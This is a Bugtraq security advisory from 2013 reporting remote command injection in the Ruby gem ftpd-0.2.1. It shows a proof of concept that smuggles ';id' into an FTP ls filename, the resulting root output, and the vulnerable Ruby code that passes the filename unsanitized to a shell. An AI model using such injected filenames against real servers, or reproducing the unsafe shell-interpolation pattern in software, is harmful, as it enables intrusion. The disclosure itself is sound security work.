| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-Id: <201303030545.r235jC55030449@sf01web3.securityfocus.com>
Date: Sun, 3 Mar 2013 05:45:12 GMT
From: larry0@...com
To: bugtraq@...urityfocus.com
Subject: Remote command execution for Ruby Gem ftpd-0.2.1
Remote command execution for Ruby Gem ftpd-0.2.1
2/28/2013
https://github.com/wconrad/ftpd
http://rubygems.org/gems/ftpd
"ftpd is a pure Ruby FTP server library. It supports implicit and explicit TLS, passive and active mode, and most of the commands specified in RFC 969. It an be used as part of a test fixture or embedded in a program."
The ls interface can have commands injected into it if option or filename contain the shell character ; The example.rb server listens to localhost only which I used to test the ftp library.
./ftpd-0.2.1/lib/ftpd/disk_file_system.rb
for this to work the file must exist in the CWD.
ftp> ls adfasdf;id
200 PORT command successful
150 Opening ASCII mode data connection
-rw-r--r-- 1 root root 0 Mar 2 05:52 adfasdf
uid=0(root) gid=0(root) groups=0(root)
226 Transfer complete
ftp>
204 Ls interface used by List and NameList 205
206 module Ls
207
208 def ls(ftp_path, option)
209 path = expand_ftp_path(ftp_path)
210 dirname = File.dirname(path)
211 filename = File.basename(path)
212 command = [
213 'ls',
214 option,
215 filename,
216 '2>&1',
217 ].compact.join(' ')
218 if File.exists?(dirname)
219 list = Dir.chdir(dirname) do
220 `{command}`
This vulnerability was fixed by the author in the latest release.
Larry W. Cashdollar
@_larry0
http://otiose.dhs.org/
Powered by blists - more mailing lists